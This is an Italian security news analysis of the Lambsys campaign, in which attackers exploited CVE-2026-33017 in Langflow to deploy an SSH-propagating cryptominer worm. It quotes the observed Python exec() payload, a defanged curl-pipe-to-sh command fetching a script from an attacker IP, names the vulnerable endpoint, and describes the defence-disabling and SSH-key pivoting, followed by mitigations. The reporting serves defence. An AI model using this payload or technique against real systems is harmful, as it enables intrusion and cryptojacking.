Il 27 marzo 2026 operatori di minacce non identificati hanno iniziato a sfruttare CVE-2026-33017, una vulnerabilità RCE non autenticata nel framework AI Langflow, per distribuire Lambsys: un worm SSH in Go che trasforma un singolo endpoint di prototipazione in una breccia enterprise-wide. La campagna è durata 19 giorni. La lezione dura molto di più.
- Il payload iniziale è una sola riga Python eseguita via
exec()sull'endpoint/api/v1/build_public_tmp/{flow_id}/flow, resa possibile dall'AUTO_LOGIN di default in Langflow - Lambsys termina 39 processi miner concorrenti, disabilita AppArmor, SELinux, UFW e iptables, stabilisce persistenza dual-mechanism e si propaga tramite chiavi SSH riutilizzate
- Una variante della stessa famiglia era compilata a maggio 2024: il payload esiste da due anni, il vettore AI è nuovo
- Il CVE è nel catalogo CISA KEV con azione richiesta entro l'8 aprile 2026; la patch è disponibile in Langflow 1.9.0
L'endpoint che non avrebbe dovuto esistere
Langflow è uno strumento di prototipazione visuale per flussi AI/ML. Il suo endpoint POST /api/v1/build_public_tmp/{flow_id}/flow accetta un parametro code contenente Python eseguito direttamente via exec() senza alcuna sandbox. Trend Micro ha documentato questo comportamento come primitiva RCE server-side.
La configurazione di default amplifica il problema. AUTO_LOGIN, abilitato di fabbrica, consente a un visitatore non autenticato di ottenere un token superuser e creare flow pubblici a richiesta. Secondo i ricercatori Trend Micro Simon Dulude e John Zhang, citati da The Hacker News, "a single line of Python code evaluated inside an unauthenticated Langflow API endpoint pulls down a shell script, fetches a miner binary, and launches it detached".
Il payload specifico osservato: __import__('os').system('curl hxxp[://]83[.]142[.]209[.]214:8080/isp.sh | sh'), con un UUID flow_id hardcoded 0ee284cc-0eb1-493f-bc60-94fa8d1cfd18. Dieci richieste di reconnaissance dal seed IP nella stessa giornata precedono l'exploit alle 19:15:04.
La sequenza rigida di Lambsys
Il binario scaricato, lambsys.elf, è un eseguibile Go UPX-packed di circa 296 KB. La sua architettura operativa non lascia spazio alla casualità: termina 39 processi miner concorrenti appartenenti a famiglie note (Kinsing, WatchDog, Rocke, Outlaw) e su 13 porte TCP mining, disabilita controlli di sicurezza, stabilisce persistenza, beacon verso il C2 e infine propaga.
La neutralizzazione delle difese è sistematica: AppArmor, SELinux, UFW, iptables, NMI watchdog e Aliyun agent. La persistenza si appoggia su due meccanismi indipendenti — un cron job ogni cinque minuti e un bash loop init_rmount ogni sessanta secondi — entrambi con capacità di re-download dal server di comando.
La propagazione laterale sfrutta il riutilizzo delle chiavi SSH: il malware enumera ~/.ssh/known_hosts, id_rsa, id_ed25519 e i socket dell'agent per pivotare automaticamente su host accessibili. Il miner XMRig personalizzato, scaricato come ks.tar dal C2 83.142.209[.]214 con verifica MD5, si connette a pool su TCP/3333 spoofando l'user-agent come SystemMonitor/6.25.0.
"Lambsys does not run its attack logic as Go functions. Instead, it forks a cascade of short-lived sh -c subprocesses... The design trades stealth for reliability"
— Trend Micro researchers Simon Dulude and John Zhang, via The Hacker News
19 giorni e una famiglia con storia
La finestra di osservazione documentata da Trend Micro si estende dal 27 marzo al 15 aprile 2026: otto exploit POST dal seed IP, con 43 richieste su 61 che presentano l'user-agent python-requests/2.25.1 e il resto con UA spoofati. Il beacon C2 avviene via POST JSON a /status.php con intervallo di circa 128 secondi.
Il dato più disturbante è la continuità del payload. Un artefatto della stessa famiglia Lambsys, con lo stesso filename e path di installazione, risulta compilato a maggio 2024 — più di due anni prima della campagna Langflow. Come ha osservato il team di ricerca Trend Micro: "The payloads behind the door have existed, in some cases with the same filename and install path, since at least May 2024. The delivery vector is the only thing that moved".
Il vettore è cambiato, il malware no. Questa non è innovazione tecnica degli operatori, ma riposizionamento opportunistico: i commodity cryptominer operator ora mass-scannano endpoint di applicazioni AI esposte.
Cosa fare adesso
- Aggiornare Langflow alla versione 1.9.0, che corregge CVE-2026-33017 secondo le release notes ufficiali e il record NVD
- Disabilitare AUTO_LOGIN in ambienti esposti a internet, eliminando la superficie di attacco non autenticata documentata da Trend Micro
- Riavviare o rigenerare le chiavi SSH presenti su host che hanno eseguito Langflow in versione vulnerabile, data la capacità di Lambsys di estrarre e riutilizzare id_rsa, id_ed25519 e socket agent
- Verificare la presenza di cron job sospetti con intervalli di cinque minuti e processi
init_rmount, indicatori documentati del meccanismo di persistenza dual-mechanism
Il paradosso del vettore familiare
Mentre i CISO investono in guardrails, prompt injection e model alignment, la prima ondata significativa di attacchi reali contro infrastrutture AI sfrutta errori elementari: autenticazione assente, sandboxing mancata, configurazioni default insicure. Langflow non è un caso isolato ma il campione di una classe più ampia — framework AI/ML esposti dove la velocità di prototipazione ha preceduto la security-by-design.
Il gap di percezione del rischio è strutturale. I team AI/ML possono non considerare Langflow come superficie di attacco critica: è uno strumento interno, di sviluppo, temporaneo. Eppure un endpoint con AUTO_LOGIN di default e exec() senza sandbox è, tecnicamente, un server di calcolo remoto arbitrario esposto a internet. La familiarità del payload — un cryptominer commodity — con la novità del vettore crea esattamente il ritardo di risposta che gli operatori sfruttano.
La responsabilità della security debt nei tool AI open-source non ha ancora un indirizzo chiaro: tra maintainer che privilegiano l'adozione, vendor che non auditano le dipendenze AI e team che deployano senza hardening, la catena si spezza nel punto più conveniente per l'attaccante. I 19 giorni di questa campagna suggeriscono che, almeno per ora, quel punto è ampio.
FAQ
- Langflow 1.9.0 risolve completamente la vulnerabilità?
- Secondo il record NVD e le analisi di Trend Micro, la versione 1.9.0 contiene la correzione. Il dossier non specifica la presenza di bypass o varianti.
- Perché il malware si propaga via SSH invece di sfruttare altri endpoint Langflow?
- Lambsys implementa la propagazione laterale tramite riutilizzo chiavi SSH come strategia primaria. Il dossier non documenta tecniche di movimento alternativo basate su Langflow stesso.
- La campagna è collegata all'exploit Sysdig osservato il 20 marzo 2026 sullo stesso CVE?
- Il brief documenta lo stesso CVE ma payload diverso: credential harvesting contro cryptominer. Non emergono sovrapposizioni infrastrutturali che colleghino le due campagne allo stato attuale.
Fonti
- https://thehackernews.com/2026/06/langflow-rce-exploited-to-deploy-monero.html
- https://gbhackers.com/langflow-rce-vulnerability-exploited/
- https://www.trendmicro.com/en/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html
- https://www.infosecurity-magazine.com/news/hackers-exploit-critical-langflow/
- https://www.trendmicro.com/en_us/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html
- https://cyberpress.org/ai-powered-ios-applications-exposed/
- https://nvd.nist.gov/vuln/detail/cve-2026-33017
- https://thehackernews.com/
- https://thehackernews.com/p/upcoming-hacker-news-webinars.html
Le informazioni sono state verificate sulle fonti citate e aggiornate al momento della pubblicazione.